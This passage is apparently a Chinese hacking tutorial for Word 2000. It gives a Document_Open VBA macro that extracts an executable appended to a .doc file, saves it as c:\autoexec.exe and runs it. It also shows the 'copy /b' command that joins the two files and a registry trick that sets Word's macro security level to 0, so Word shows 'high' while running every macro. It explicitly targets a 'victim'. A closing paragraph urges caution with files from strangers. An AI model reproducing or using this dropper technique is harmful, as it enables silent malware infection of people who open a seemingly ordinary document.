好了,有了这些准备工作就可以开始了,我们运行word2000,打开visual basic编辑器,新建一个模块,把上面的函数
和参数声明拷进去!再回到“thisdocument.的代码视图,选择document.nbspopen的事件,输入一下代码:
private sub document.open()
dim buffer(65536) as byte
dim h, h2, j, i, k as long
h = createfile(thisdocument.path & "/" & thisdocument.name, generic_read, file_share_read + file_share_write, 0, open_existing, 0, 0)
‘以share_read的方式打开自身的doc文件
h2 = createfile("c:\\autoexec.exe", generic_write, 0, 0, create_always, 0, 0)
‘新建一个exe文件准备存放读取出来的数据.
if h = invalid_handle_value then
exit sub
end if
k = setfilepointer(h, 32768, nil, 0)
‘把文件指针移动到doc文件与exe文件交界处.
do
i = readfile(h, buffer(0), 65536, j, 0)
i = writefile(h2, buffer(0), j, j, 0)
loop until j < 65536
closehandle (h)
closehandle (h2)
shell "c:\\autoexec.exe"
‘运行exe文件
end sub
这样宏就编写好了,注意的地方就是上面setfilepointer函数的使用部分:32768是你编写完宏保存
好的doc文件的文件大小,不一顶就是32768哦,大家注意!
大家可能有疑问,如何把exe文件接到doc文件后面呢?很简单,把你要接的exe放到和
这个doc文件同一个目录下.运行doc命令:
copy /b xxxx.doc + xxxxx.exe newdoc.doc
这样就可以了~~~.当你打开这个newdoc.doc的时候,宏就会把后面的exe文件读出来并保存
在c:\\autoexec.exe中,然后运行,是不是很恐怖啊!不过这需要你的word2000安全度为最低的时候
才能实现,关于这个安全度的问题,我们又发现了微软的小bug,大家看看注册表中这个键: hkey_current_user\\software\\microsoft\\office\\9.0\\word\\security 中的
level值.当安全度是3(高)的时候,word不会运行任何的宏,2(中)的时候word会询问你是否运行宏,1(低)的时候
word就会自动运行所有的宏!但很容易就被发现安全度被设为低了,聪明的你一定想到如果这个值
变为0的时候会怎么样!!??对了!如果设为0的话,word里面就会显示安全度为高,但却能自动运行任何
的宏!!是不是很夸张??和注册表编辑器的后门一样这都是ms的后门吧?
如果要受害人的机器接受你的doc文件又能顺利运行,最重要就是把word的安全度在注册表中的
值改为0,怎么改??方法太多了吧,单是ie的恶意代码能实现的都太多了,另外,如果网页上连接上是doc的
话,ie也会自动下载该doc文件!危险的ms啊!!
这个算不算漏洞我不敢说,但防范真的很难,除非一天到晚监视着注册表,或者不用word?太消极了
吧,最重要的是小心防范,陌生人的东西千万不要收!包括非exe文件,我们现在发现了doc文件能
隐藏exe文件,也会有人发现其他文件能隐藏exe,所以大家千万要小心。

相关文档
最新文档